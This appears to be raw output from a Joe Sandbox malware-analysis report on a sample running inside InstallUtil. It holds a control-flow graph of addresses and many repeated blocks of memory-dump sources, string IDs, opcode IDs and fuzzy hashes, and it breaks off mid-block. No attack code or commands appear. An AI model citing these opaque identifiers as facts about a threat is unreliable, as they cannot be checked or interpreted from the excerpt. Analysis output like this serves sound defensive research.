                                                                                                                control_flow_graph 1400 9c8801-9c881d 1401 9c881f-9c8824 1400->1401 1402 9c8829-9c8835 1400->1402 1403 9c8bbe-9c8bc3 1401->1403 1405 9c8845-9c884a 1402->1405 1406 9c8837-9c8839 1402->1406 1405->1403 1407 9c8841-9c8843 1406->1407 1407->1405 1408 9c884f-9c885b 1407->1408 1410 9c885d-9c8869 1408->1410 1411 9c886b-9c8870 1408->1411 1410->1411 1413 9c8875-9c8880 1410->1413 1411->1403 1415 9c892a-9c8935 1413->1415 1416 9c8886-9c8891 1413->1416 1419 9c89d8-9c89e4 1415->1419 1420 9c893b-9c894a 1415->1420 1421 9c88a7 1416->1421 1422 9c8893-9c88a5 1416->1422 1429 9c89f4-9c8a06 1419->1429 1430 9c89e6-9c89f2 1419->1430 1431 9c894c-9c8956 1420->1431 1432 9c895b-9c896a 1420->1432 1423 9c88ac-9c88ae 1421->1423 1422->1423 1424 9c88ce-9c88d3 1423->1424 1425 9c88b0-9c88bf 1423->1425 1424->1403 1425->1424 1435 9c88c1-9c88cc 1425->1435 1448 9c8a08-9c8a14 1429->1448 1449 9c8a2a-9c8a2f 1429->1449 1430->1429 1441 9c8a34-9c8a3f 1430->1441 1431->1403 1439 9c896c-9c8978 1432->1439 1440 9c898e-9c8997 1432->1440 1435->1424 1446 9c88d8-9c88e1 1435->1446 1450 9c897a-9c897f 1439->1450 1451 9c8984-9c8989 1439->1451 1454 9c89ad 1440->1454 1455 9c8999-9c89ab 1440->1455 1452 9c8a45-9c8a4e 1441->1452 1453 9c8b21-9c8b2c 1441->1453 1463 9c88ed-9c88fc 1446->1463 1464 9c88e3-9c88e8 1446->1464 1460 9c8a16-9c8a1b 1448->1460 1461 9c8a20-9c8a25 1448->1461 1449->1403 1450->1403 1451->1403 1469 9c8a64 1452->1469 1470 9c8a50-9c8a62 1452->1470 1467 9c8b2e-9c8b38 1453->1467 1468 9c8b56-9c8b65 1453->1468 1458 9c89b2-9c89b4 1454->1458 1455->1458 1458->1419 1466 9c89b6-9c89c2 1458->1466 1460->1403 1461->1403 1476 9c88fe-9c890a 1463->1476 1477 9c8920-9c8925 1463->1477 1464->1403 1478 9c89ce-9c89d3 1466->1478 1479 9c89c4-9c89c9 1466->1479 1484 9c8b4f-9c8b54 1467->1484 1485 9c8b3a-9c8b46 1467->1485 1486 9c8bb9 1468->1486 1487 9c8b67-9c8b76 1468->1487 1472 9c8a69-9c8a6b 1469->1472 1470->1472 1474 9c8a6d-9c8a79 1472->1474 1475 9c8a7b 1472->1475 1483 9c8a80-9c8a82 1474->1483 1475->1483 1492 9c890c-9c8911 1476->1492 1493 9c8916-9c891b 1476->1493 1477->1403 1478->1403 1479->1403 1490 9c8a8e-9c8aa1 1483->1490 1491 9c8a84-9c8a89 1483->1491 1484->1403 1485->1484 1498 9c8b48-9c8b4d 1485->1498 1486->1403 1487->1486 1496 9c8b78-9c8b90 1487->1496 1499 9c8ad9-9c8ae3 1490->1499 1500 9c8aa3 1490->1500 1491->1403 1492->1403 1493->1403 1509 9c8bb2-9c8bb7 1496->1509 1510 9c8b92-9c8bb0 1496->1510 1498->1403 1506 9c8ae5-9c8af1 call 9c8270 1499->1506 1507 9c8b02-9c8b0e 1499->1507 1502 9c8aa6-9c8ab7 call 9c8270 1500->1502 1512 9c8abe-9c8ac3 1502->1512 1513 9c8ab9-9c8abc 1502->1513 1520 9c8af8-9c8afd 1506->1520 1521 9c8af3-9c8af6 1506->1521 1522 9c8b17 1507->1522 1523 9c8b10-9c8b15 1507->1523 1509->1403 1510->1403 1512->1403 1513->1512 1516 9c8ac8-9c8acb 1513->1516 1517 9c8bc4-9c8bec 1516->1517 1518 9c8ad1-9c8ad7 1516->1518 1527 9c8bee-9c8bf3 1517->1527 1528 9c8bf8-9c8c03 1517->1528 1518->1499 1518->1502 1520->1403 1521->1507 1521->1520 1524 9c8b1c 1522->1524 1523->1524 1524->1403 1529 9c8d79-9c8d7d 1527->1529 1532 9c8c09-9c8c14 1528->1532 1533 9c8cab-9c8cb4 1528->1533 1538 9c8c2a 1532->1538 1539 9c8c16-9c8c28 1532->1539 1536 9c8cff-9c8d0a 1533->1536 1537 9c8cb6-9c8cc1 1533->1537 1546 9c8d0c-9c8d1e 1536->1546 1547 9c8d20 1536->1547 1548 9c8d77 1537->1548 1549 9c8cc7-9c8cd9 1537->1549 1540 9c8c2f-9c8c31 1538->1540 1539->1540 1544 9c8c66-9c8c78 1540->1544 1545 9c8c33-9c8c42 1540->1545 1544->1548 1557 9c8c7e-9c8c8c 1544->1557 1545->1544 1553 9c8c44-9c8c5a 1545->1553 1551 9c8d25-9c8d27 1546->1551 1547->1551 1548->1529 1549->1548 1558 9c8cdf-9c8ce3 1549->1558 1551->1548 1555 9c8d29-9c8d38 1551->1555 1553->1544 1576 9c8c5c-9c8c61 1553->1576 1564 9c8d3a-9c8d43 1555->1564 1565 9c8d60 1555->1565 1568 9c8c8e-9c8c93 1557->1568 1569 9c8c98-9c8c9b 1557->1569 1561 9c8cef-9c8cf2 1558->1561 1562 9c8ce5-9c8cea 1558->1562 1566 9c8d7e-9c8dae call 9c8390 1561->1566 1567 9c8cf8-9c8cfb 1561->1567 1562->1529 1579 9c8d59 1564->1579 1580 9c8d45-9c8d57 1564->1580 1570 9c8d65-9c8d67 1565->1570 1587 9c8dc5-9c8dc9 1566->1587 1588 9c8db0-9c8dc4 1566->1588 1567->1558 1572 9c8cfd 1567->1572 1568->1529 1569->1566 1573 9c8ca1-9c8ca4 1569->1573 1570->1548 1575 9c8d69-9c8d75 1570->1575 1572->1548 1573->1557 1574 9c8ca6 1573->1574 1574->1548 1575->1529 1576->1529 1581 9c8d5e 1579->1581 1580->1581 1581->1570
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$4'^q$;^q
                                                                                                                • API String ID: 0-799016360
                                                                                                                • Opcode ID: a6c907ea87ee960632555fafad3b509c4e5e3b181a91a39bc126901f11f002f5
                                                                                                                • Instruction ID: cf161cdcb90b4a1d49a05ae3d29d52764b70b9325928cd150c8a0ca5b9371af4
                                                                                                                • Opcode Fuzzy Hash: a6c907ea87ee960632555fafad3b509c4e5e3b181a91a39bc126901f11f002f5
                                                                                                                • Instruction Fuzzy Hash: 4FF16D70B045018FDB299A29C868F3A779AEF85740F1844AEE452CF3F5DE29CC429753
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: 2054b324199b283c063b335c50cc7b8ab2fe529266dfb1d2a2e41d84ef411574
                                                                                                                • Instruction ID: 18cc83f7896259e0204c82e8726b4c45f6b5d2a043d9d8b8b00c458cd9efe833
                                                                                                                • Opcode Fuzzy Hash: 2054b324199b283c063b335c50cc7b8ab2fe529266dfb1d2a2e41d84ef411574
                                                                                                                • Instruction Fuzzy Hash: 75529574A00258CFEB64DBA4C850B9EBBB6FF84301F1081A9D5066B365DF319E89DF52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q$Te^q
                                                                                                                • API String ID: 0-3743469327
                                                                                                                • Opcode ID: d22c1b5f6518714a2311e91b918a3eed8348f255339893e6df00d6b2a39c4b0a
                                                                                                                • Instruction ID: dd722f0e027669a880228c261cfa12ef35ef523bc10f7975970aef8773bd02b7
                                                                                                                • Opcode Fuzzy Hash: d22c1b5f6518714a2311e91b918a3eed8348f255339893e6df00d6b2a39c4b0a
                                                                                                                • Instruction Fuzzy Hash: 1752B174A01228CFDB65DF64D994BADBBB2FB89300F5045E9D809A73A4CB319E85CF41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q$Te^q
                                                                                                                • API String ID: 0-3743469327
                                                                                                                • Opcode ID: 0089ea35fae0f15474ea589dfb2b9184c621aa7c716368dfcb57f41574d76a38
                                                                                                                • Instruction ID: 3651ebbd1a243c898040b66a799a25bf71548e19ec8a9a2f19816554860b8780
                                                                                                                • Opcode Fuzzy Hash: 0089ea35fae0f15474ea589dfb2b9184c621aa7c716368dfcb57f41574d76a38
                                                                                                                • Instruction Fuzzy Hash: AF52B274A01228CFDB65DF64D994BADBBB2FB89300F5045E9D809A73A4CB319E85CF41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q$Te^q
                                                                                                                • API String ID: 0-3743469327
                                                                                                                • Opcode ID: d058e180e9da4824da9a63bda1d50e0bef226e8068664e6a0dc8f13b3034d3bc
                                                                                                                • Instruction ID: 28a2d2e6df20ae1e48f79d31af4679eb1574b62d4adad68d4e120ef865f39b61
                                                                                                                • Opcode Fuzzy Hash: d058e180e9da4824da9a63bda1d50e0bef226e8068664e6a0dc8f13b3034d3bc
                                                                                                                • Instruction Fuzzy Hash: C022C374A01228DFDB65EF64D994BADBBB2FB89300F5041E9D809A7364CB319E85CF41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o^q$Hbq
                                                                                                                • API String ID: 0-662517225
                                                                                                                • Opcode ID: 5d1d365e802419b9ee48eeeedd764bba564d9c2cb21dee7e935a856a5119bb28
                                                                                                                • Instruction ID: 3a299fbd822c690e9f2c04777905f8bbe726e651f9adc70e01eaca009aac3749
                                                                                                                • Opcode Fuzzy Hash: 5d1d365e802419b9ee48eeeedd764bba564d9c2cb21dee7e935a856a5119bb28
                                                                                                                • Instruction Fuzzy Hash: F5D16C70A002188FDB19DF69C894BAEBBF6FB84340F24846DE506DB395DE349D46CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Hbq$Hbq
                                                                                                                • API String ID: 0-4258043069
                                                                                                                • Opcode ID: f46218bed9e8493963367c99216b74939a81beaf6a14844413cec3529b53507d
                                                                                                                • Instruction ID: fe18aba0f9b2fbc5548579663c53dc96be2a495e7c1914f040b6254649ffc436
                                                                                                                • Opcode Fuzzy Hash: f46218bed9e8493963367c99216b74939a81beaf6a14844413cec3529b53507d
                                                                                                                • Instruction Fuzzy Hash: E1B1A330B046548FDB159F39C894B2A7BE6AF88350F15856DE846CB3A1DF34EC81D792
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,bq$,bq
                                                                                                                • API String ID: 0-2699258169
                                                                                                                • Opcode ID: 2e3ae3fccf351d7f022fcfeb80b88ac9098d0c5b98a516a19933158c755fc20e
                                                                                                                • Instruction ID: ed0ab95a4c81c1953e8d140e9f9db27a6962598db2c92de84025713ec1402692
                                                                                                                • Opcode Fuzzy Hash: 2e3ae3fccf351d7f022fcfeb80b88ac9098d0c5b98a516a19933158c755fc20e
                                                                                                                • Instruction Fuzzy Hash: FF818F34E00A059FCB14DF69C888E6AB7B6BF89311B26856DD406DB3A5C731FD81CB52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q$LR^q
                                                                                                                • API String ID: 0-4089051495
                                                                                                                • Opcode ID: 26c90dfaccba9f4ad3bc8be302c569aab27199a2b6e92dc9a2da4b2c06756397
                                                                                                                • Instruction ID: f74cb03ed0de590b850548a41571ad7508e3c17b949a111a2dbd1849fa1af101
                                                                                                                • Opcode Fuzzy Hash: 26c90dfaccba9f4ad3bc8be302c569aab27199a2b6e92dc9a2da4b2c06756397
                                                                                                                • Instruction Fuzzy Hash: DC818134B101068FCB04DF79D854A6E7BF6FF88754B1585AAE545DB3A1DA30DC02CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (&^q$(bq
                                                                                                                • API String ID: 0-1294341849
                                                                                                                • Opcode ID: 61db52ca30982eb196ca56994b6fd21d5a5cbc88156defd9d9c8a5878731d466
                                                                                                                • Instruction ID: 32217af76d9b1294e106812c5954a354735cc2402a75d4791c76866bca0240bf
                                                                                                                • Opcode Fuzzy Hash: 61db52ca30982eb196ca56994b6fd21d5a5cbc88156defd9d9c8a5878731d466
                                                                                                                • Instruction Fuzzy Hash: 65718031F002199BDB15DFA9D850AAEBBB6FF84740F148569E406AB380DF34AD06C796
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Xbq$Xbq
                                                                                                                • API String ID: 0-1243427068
                                                                                                                • Opcode ID: eb8e4d9f07efc6ede3ea17bcab9677a393d9a6a54c7fbfdc41c5dd5443f1702d
                                                                                                                • Instruction ID: 5dbb1d6f1a32326a15dfbbabac9be939d71ec18563f8607e408df3f79213b1ff
                                                                                                                • Opcode Fuzzy Hash: eb8e4d9f07efc6ede3ea17bcab9677a393d9a6a54c7fbfdc41c5dd5443f1702d
                                                                                                                • Instruction Fuzzy Hash: AD31F471F043148BDF1C4ABA899477AA5DAABC4310F18C83DE80AC73A4DF74CE4096A2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q
                                                                                                                • API String ID: 0-2625958711
                                                                                                                • Opcode ID: 0a92dc7eab1e8c00037e702ce8d5205a35c6f88faf9db2b2775108e4d9175786
                                                                                                                • Instruction ID: 19e703f5f894386c33b14afbb727e6de0ebda74eff4fd16873885aa3193f65c7
                                                                                                                • Opcode Fuzzy Hash: 0a92dc7eab1e8c00037e702ce8d5205a35c6f88faf9db2b2775108e4d9175786
                                                                                                                • Instruction Fuzzy Hash: 8C22B87490061ACFCB54EF64ED94A9DBBB1FF88301F1085A9D809AB369EB706D85CF40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q
                                                                                                                • API String ID: 0-2625958711
                                                                                                                • Opcode ID: ec2aaba27fecd9c1170940e71034e65e67f4eaf78f4c9652f6bc2b3f768d599f
                                                                                                                • Instruction ID: 8c72292b245e826ec855d54a7bca6b268b79399dc0284de8314b874bc76bcd75
                                                                                                                • Opcode Fuzzy Hash: ec2aaba27fecd9c1170940e71034e65e67f4eaf78f4c9652f6bc2b3f768d599f
                                                                                                                • Instruction Fuzzy Hash: C022A77491061ACFCB54EF64ED94A9DBBB1FF88301F1085A9D809AB369EB706D85CF40
                                                                                                                APIs
                                                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 05D982B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943607125.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5d90000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 5782e5e8c51e73c812478e1c27aee8f8fa6b6d2dba91958f6f9cdf6b3ea40638
                                                                                                                • Instruction ID: d3c79dd93853653b14d864a74b56a91376a082a2e6f8e0210ca2586e6c20d45d
                                                                                                                • Opcode Fuzzy Hash: 5782e5e8c51e73c812478e1c27aee8f8fa6b6d2dba91958f6f9cdf6b3ea40638
                                                                                                                • Instruction Fuzzy Hash: 53115C74E051099FCF08DFA8D884EADFBF5FB89704F149166E904E7242DA30E841DB60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: 04a4583a71766da61632d220c817261091bd4b586411f243e89c09503c8ad7fc
                                                                                                                • Instruction ID: e92012466715fafe04ff30b548ecc7a5477afdba1b9aef1be07bce183ec03bf9
                                                                                                                • Opcode Fuzzy Hash: 04a4583a71766da61632d220c817261091bd4b586411f243e89c09503c8ad7fc
                                                                                                                • Instruction Fuzzy Hash: 5C61A575E00218CFDB54DFA9C990A9DBBB2FF89300F60816AD849AB365DB319D85CF40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: 6360ffc97db220a9765177f527dc6fa42331a46da8b966f9ed18901c80aef273
                                                                                                                • Instruction ID: dd7cda5b4235490daa40496af0400ed4fc63c87bfdc30ddb40c40e250b3a1e30
                                                                                                                • Opcode Fuzzy Hash: 6360ffc97db220a9765177f527dc6fa42331a46da8b966f9ed18901c80aef273
                                                                                                                • Instruction Fuzzy Hash: CA618475E00218CFDB54DFA9C990A9DBBB2FF89310F60816AD809AB365DB319D85CF41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o^q
                                                                                                                • API String ID: 0-74704288
                                                                                                                • Opcode ID: 57b23c0482d97ffdd59efaa1cd7192f50144060db818d1d51c8e33672faed14b
                                                                                                                • Instruction ID: 05702c231358163032087367425144f0fb7dc5cf7dcd21ac585e97e06017e4c1
                                                                                                                • Opcode Fuzzy Hash: 57b23c0482d97ffdd59efaa1cd7192f50144060db818d1d51c8e33672faed14b
                                                                                                                • Instruction Fuzzy Hash: 9A41D131B042489FCB059B799C54AAE7BF6FBC8310F24446DD906DB3A1CE309C06CB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7a7276f00e8332d0d87a683acd6368419e3afa4ac7c7bca58d5d9f02384bdf70
                                                                                                                • Instruction ID: 6944cb153482963700c21a0d4b1976f57093f5ad22bef0a8e0f864a12ceba0fe
                                                                                                                • Opcode Fuzzy Hash: 7a7276f00e8332d0d87a683acd6368419e3afa4ac7c7bca58d5d9f02384bdf70
                                                                                                                • Instruction Fuzzy Hash: 01F11875E402198FCB04CFADD984EADBBF6BF88314B168059E445AB361CB35EC41CB56
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 52cdd6844540ec1592464f2db70c650821a6fc2685ce0e89d55fcccc7f8961ad
                                                                                                                • Instruction ID: 12749218f2b05d6e9766e092b768d811a6c434b354527da85cdcd3ffc435ccb7
                                                                                                                • Opcode Fuzzy Hash: 52cdd6844540ec1592464f2db70c650821a6fc2685ce0e89d55fcccc7f8961ad
                                                                                                                • Instruction Fuzzy Hash: 58A1C538A01218DFDB25EF64D994BADBBB6FB89300F108499E84977368CB715E85CF41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3b42cc1e5f0cf639bd2839bb4ec2f1e0d4bdbaa6a505783b55f7dbc3c7a82edf
                                                                                                                • Instruction ID: e426ca2913ae51d2ce16466f88a2b2f9b38bd363586c9c09fdf9684d76905a03
                                                                                                                • Opcode Fuzzy Hash: 3b42cc1e5f0cf639bd2839bb4ec2f1e0d4bdbaa6a505783b55f7dbc3c7a82edf
                                                                                                                • Instruction Fuzzy Hash: F6712734B086458FCB54CF68C998F6ABBEAAF49300B1900A9E806CB371DB74DC41DF52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1fae8012a68ecc8183e18fa417be2a730b47a6ed343786df4ae487ec0ad9d9a8
                                                                                                                • Instruction ID: 5552b4356bf27453b3f613c24c3d7dc11d31b6a11aebe39799781393392e7006
                                                                                                                • Opcode Fuzzy Hash: 1fae8012a68ecc8183e18fa417be2a730b47a6ed343786df4ae487ec0ad9d9a8
                                                                                                                • Instruction Fuzzy Hash: B951BE3003A687CFC3002B20A9EC56EBB61FB5F71BB067D14E11E8A5B59BB15845EA12
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6da9a06ed300be3c7f91f735558a2b73eb9e9ccbe89fe26df07ebd6ec316ee2
                                                                                                                • Instruction ID: 762961784be567e6cbf42160de6dd3f8ebc9fcfc9103fad33a1134ef4364b95c
                                                                                                                • Opcode Fuzzy Hash: a6da9a06ed300be3c7f91f735558a2b73eb9e9ccbe89fe26df07ebd6ec316ee2
                                                                                                                • Instruction Fuzzy Hash: 8951AF3003A787CFC2002B20A9EC12FBBA5FB5F71BB057D14F11E8A5B59BB15845AA21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 42d6531efa3bba84e0f302b7ee5f048a310f90d1508b6d736099da036291ca8e
                                                                                                                • Instruction ID: c9b46c2876e0a7b755ebe08cffa1d4b6cfcc2134444432192d213545408317e2
                                                                                                                • Opcode Fuzzy Hash: 42d6531efa3bba84e0f302b7ee5f048a310f90d1508b6d736099da036291ca8e
                                                                                                                • Instruction Fuzzy Hash: B0611274D01318DFDB15DFA4D984AADBBB2FF88304F208529D809AB394DB35598ACF41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a62ce790c0c976513b81f8faabb9013a84609a4c54a6cfad7585ded79c159809
                                                                                                                • Instruction ID: e24535e35db201ef48b983b3a7d04467a2d88c07a909914419acabd05e92b33f
                                                                                                                • Opcode Fuzzy Hash: a62ce790c0c976513b81f8faabb9013a84609a4c54a6cfad7585ded79c159809
                                                                                                                • Instruction Fuzzy Hash: 75518274E01218DFDB48DFA9D98499DBBF2FF89300F209169E819AB365DB30A905CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 74773153963c2fc7c2002b77dbbab5e85056ecdb4362f32dd751503f9498d9f3
                                                                                                                • Instruction ID: 5aa9515b5f463398150c598d6a920f0b1be3e33a8bcac29e452c9f01aff3bb26
                                                                                                                • Opcode Fuzzy Hash: 74773153963c2fc7c2002b77dbbab5e85056ecdb4362f32dd751503f9498d9f3
                                                                                                                • Instruction Fuzzy Hash: 8451A074E01608CFCB48DFA9D59499DBBF2FF89300B209469E809AB325DB35AD42CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
